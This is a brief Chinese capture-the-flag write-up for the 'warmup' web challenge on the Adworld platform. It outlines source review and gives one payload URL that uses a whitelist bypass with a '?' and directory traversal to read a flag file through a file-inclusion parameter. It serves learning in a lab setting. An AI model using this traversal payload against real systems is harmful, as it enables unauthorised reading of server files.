攻防世界-web-高手进阶区005-warmup

1.f12查看源代码,有提示

 

2.审计代码

 

3.提到hint.php,查看页面

 

4.构造payload,四层目录

http://111.198.29.45:35206/source.php?file=hint.php?./../../../../ffffllllaaaagggg

 


原文地址:https://www.cnblogs.com/joker-vip/p/12469379.html